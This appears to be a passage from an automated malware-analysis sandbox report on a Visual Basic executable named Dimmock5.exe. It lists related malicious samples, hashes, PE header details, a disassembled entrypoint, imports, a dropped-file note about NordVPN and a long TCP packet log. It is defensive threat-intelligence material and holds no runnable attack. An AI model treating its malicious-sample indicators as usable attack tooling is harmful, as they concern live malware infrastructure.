	document-340500177.xls	Get hash	malicious	Browse	198.50.218.68
	document-921217151.xls	Get hash	malicious	Browse	198.50.218.68
	document-1500258943.xls	Get hash	malicious	Browse	198.50.218.68
	document-1823104059.xls	Get hash	malicious	Browse	198.50.218.68
	document-1434617389.xls	Get hash	malicious	Browse	198.50.218.68
	document-103083228.xls	Get hash	malicious	Browse	198.50.218.68
	document-1913529948.xls	Get hash	malicious	Browse	198.50.218.68
	document-758557531.xls	Get hash	malicious	Browse	198.50.218.68
	document-707357347.xls	Get hash	malicious	Browse	198.50.218.68

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	pQlSDfwyYkf.js	Get hash	malicious	Browse	172.217.23.33
	Balance payment..exe	Get hash	malicious	Browse	172.217.23.33
	pQlSDfwyYkf.js	Get hash	malicious	Browse	172.217.23.33
	document-1641473761.xls	Get hash	malicious	Browse	172.217.23.33
	ObJRDAd8jZ.exe	Get hash	malicious	Browse	172.217.23.33
	SecuriteInfo.com.Trojan.Encoder.33750.22954.exe	Get hash	malicious	Browse	172.217.23.33
	yKthoYkcfg.exe	Get hash	malicious	Browse	172.217.23.33
	Confirmation Payment Receipt.doc	Get hash	malicious	Browse	172.217.23.33
	Friday, April 2nd, 2021, 20210402062906.8CE1B73ADE2A192C@compassionarmy.com.htm	Get hash	malicious	Browse	172.217.23.33
	documents-602438418.xlsm	Get hash	malicious	Browse	172.217.23.33
	1006.xlsm	Get hash	malicious	Browse	172.217.23.33
	262.xlsm	Get hash	malicious	Browse	172.217.23.33
	1193.xlsm	Get hash	malicious	Browse	172.217.23.33
	1094.xlsm	Get hash	malicious	Browse	172.217.23.33
	1366.xlsm	Get hash	malicious	Browse	172.217.23.33
	2086.xlsm	Get hash	malicious	Browse	172.217.23.33
	1430.xlsm	Get hash	malicious	Browse	172.217.23.33
	581.xlsm	Get hash	malicious	Browse	172.217.23.33
	3324.xlsm	Get hash	malicious	Browse	172.217.23.33
	871.xlsm	Get hash	malicious	Browse	172.217.23.33

Dropped Files

No context

Created / dropped Files

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.5051992825729466
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Dimmock5.exe
File size:	57344
MD5:	1f6c8e6472b60d49704703c99b28a4b8
SHA1:	1770766f6cfb51725e035b0f38f560bf03d73fae
SHA256:	e0e93e3b7866085b8384948d12a2eb613fc9eb0bc283fbbe12841a5dca11ba9f
SHA512:	9e7e671c36f9f7a7206e236a5932dcefdecee4781fcb105e9c7fc458e0632383b4982cf2401e0ec7dc5eafd4619b888a74ac1b06983aa1d67d9493c85f55c8db
SSDEEP:	768:5hf6jt9ZzkkIH1f6W+iitWmyQJkVWy+qaEmTqtid:5d6jtH9IHNKNWHtIt
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...~ae`.....................0....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x40169c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x6065617E [Thu Apr 1 06:00:30 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b983fc96c0bd34be8388eeea33042759

Entrypoint Preview

Instruction
push 00401874h
call 00007F8844ED7FB5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dh, cl
bound edi, dword ptr [esi-74DBD20Eh]
dec ebx
sahf
mov bh, D0h
mov ah, 21h
stc
push ebp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
call 00007F88A7F07B44h
imul esi, dword ptr [edx+63h], 6F766D75h
insb
jne 00007F8844ED8036h
add byte ptr [eax], cl
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add eax, 671CB2E9h
cmpsb
xchg dword ptr [ebx], edx
dec ebx
stosd
popfd
push esi
out dx, al
push ebx
movsd
jmp 00007F87E69A3C8Eh
shl ebx, 1
inc eax
dec eax
xchg eax, esi
pop eax
push ss
jmp far 4F3Ah : 9B80EEF1h
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax+00h], cl
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [esi+75h], cl
popad
outsb
arpl word ptr [ebp+72h], sp
jnc 00007F8844ED7FC2h
or eax, 47000901h
outsd
outsb
outsd
jc 00007F8844ED802Bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaf14	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x9d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa528	0xb000	False	0.537863991477	data	6.38736816411	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xc000	0x11b4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x9d8	0x1000	False	0.1806640625	data	2.12896103936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xe8a8	0x130	data
RT_ICON	0xe5c0	0x2e8	data
RT_ICON	0xe498	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xe468	0x30	data
RT_VERSION	0xe150	0x318	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaHresultCheck, __vbaAryMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaI2Str, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVar2Vec, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaLateMemCall, __vbaInStrB, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Collutions
InternalName	Dimmock5
FileVersion	1.00
CompanyName	Collutions
LegalTrademarks	Collutions
Comments	Collutions
ProductName	Collutions
ProductVersion	1.00
FileDescription	Creepy Collutions
OriginalFilename	Dimmock5.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2021 21:28:57.063009024 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.104257107 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.104377985 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.104971886 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.148574114 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.162067890 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.162125111 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.162149906 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.162163973 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.162199974 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.162213087 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.162225008 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.162273884 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.178500891 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.219722986 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.220861912 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.221852064 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.267597914 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.623802900 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.623862982 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.623898029 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.623936892 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.623975992 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.624003887 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.624044895 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.624052048 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.624057055 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.626981974 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.627096891 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.627722979 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.627768993 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.627799988 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.627825975 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.630914927 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.630968094 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.631012917 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.631051064 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.633925915 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.633970022 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.634013891 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.634205103 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.636962891 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.637058020 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.638370991 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.638412952 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.638499022 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.638520956 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.667357922 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.667468071 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.667634964 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.668855906 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.668895006 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.669025898 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.669043064 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.671967983 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.672013044 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.672055960 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.672091961 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.674973011 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.675021887 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.675065041 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.675108910 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.678006887 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.678050041 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.678093910 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.678137064 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.681075096 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.681117058 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.681170940 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.681217909 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.684149027 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.684191942 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.684227943 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.684251070 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.687216043 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.687258959 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.687311888 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.687336922 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.690288067 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.690329075 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.690386057 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.690412998 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.693048000 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.693090916 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.693126917 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.693152905 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.695774078 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.695825100 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.695856094 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.695909023 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.698532104 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.698606014 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.698622942 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.698710918 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.701239109 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.701280117 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.701330900 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.701368093 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.704010010 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.704060078 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.704104900 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.704135895 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.706733942 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.706777096 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.706832886 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.706856966 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.711711884 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.711755037 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.711884975 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.711909056 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.712650061 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.712690115 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.712733984 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.712754011 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.714622021 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.714663982 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.714708090 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.714730978 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.716571093 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.716610909 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.716650963 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.716698885 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.718523026 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.718563080 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.718614101 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.718636036 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.720510006 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.720551014 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.720596075 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.720633030 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.722413063 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.722454071 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.722495079 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.722518921 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.724334955 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.724375963 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.724423885 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.724461079 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.726320028 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.726362944 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.726432085 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.726465940 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.728312969 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.728369951 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.728410006 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.728434086 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.730190039 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.730235100 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.730278015 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.730304003 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.732122898 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.732171059 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.732213974 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.732237101 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.734106064 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.734152079 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.734224081 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.734251976 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.736004114 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.736052990 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.736116886 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.736141920 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.737915039 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.737943888 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.738018990 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.739856005 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.739883900 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.739962101 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.739998102 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.741777897 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.741799116 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.741831064 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.741852999 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.743729115 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.743751049 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.743779898 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.743801117 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.745623112 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.745646000 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.745707989 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.747528076 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.747548103 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.747615099 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.749262094 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.749280930 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.749341965 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.750938892 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.750957966 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.751013994 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.752650023 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.752670050 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.752720118 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.752758980 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.754286051 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.754307032 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.754365921 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.755949020 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.755968094 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.756021976 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.756058931 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.757565975 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.757586002 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.757652998 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.759179115 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.759202957 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.759252071 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.759289026 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.760202885 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.760226011 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.760273933 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.760313988 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.761229992 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.761253119 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.761312008 CEST	49741	443	192.168.2.3	172.217.23.33
